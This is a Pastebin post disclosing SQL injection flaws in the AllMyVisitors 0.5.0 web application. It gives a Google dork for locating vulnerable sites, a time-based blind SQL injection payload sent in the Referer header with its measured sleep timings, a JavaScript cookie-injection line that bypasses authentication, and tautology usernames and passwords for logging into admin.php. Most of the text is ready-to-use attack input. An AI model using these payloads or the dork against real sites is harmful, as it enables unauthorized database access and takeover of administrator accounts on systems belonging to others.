API tools faq
paste
Advertisement
Kyfx

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability

Kyfx
Mar 6th, 2015
385
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.19 KB | None | 0 0
raw download clone embed print report
  1. Google Dork : "Copyright (c) 2004 by voice of web"
  2.  
  3. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user
  4. input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and
  5. doesn't properly filter out dangerous characters.
  6.  
  7. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it
  8. is relatively easy to protect against, there is a large number of web applications vulnerable.
  9. This vulnerability affects /AllMyVisitors0.5.0/.
  10. Discovered by: Scripting (Blind_Sql_Injection.script).
  11. Attack details
  12. HTTP Header input Referer was set to
  13. if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
  14. */
  15.  
  16. Tests performed :
  17.  
  18. if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"
  19. */ => 6.099 s
  20. if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"
  21. */ => 18.439 s
  22. if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
  23. */ => 0.561 s
  24. if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"
  25. */ => 12.558 s
  26. if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
  27. */ => 0.515 s
  28. if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
  29. */ => 0.53 s
  30. if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
  31. */ => 0.468 s
  32. if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"
  33. */ => 12.496 s
  34. if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
  35. */ => 0.577 s
  36.  
  37. Insecure Cookie Handling :
  38.  
  39. admin.php
  40.  
  41. javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";
  42.  
  43. Auth Bypass admin.php :
  44.  
  45. Username : azerty' or '1=1--# Real admin name
  46.  
  47. Password : demo1 ' or ' 1=1 or Admin or any thing
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!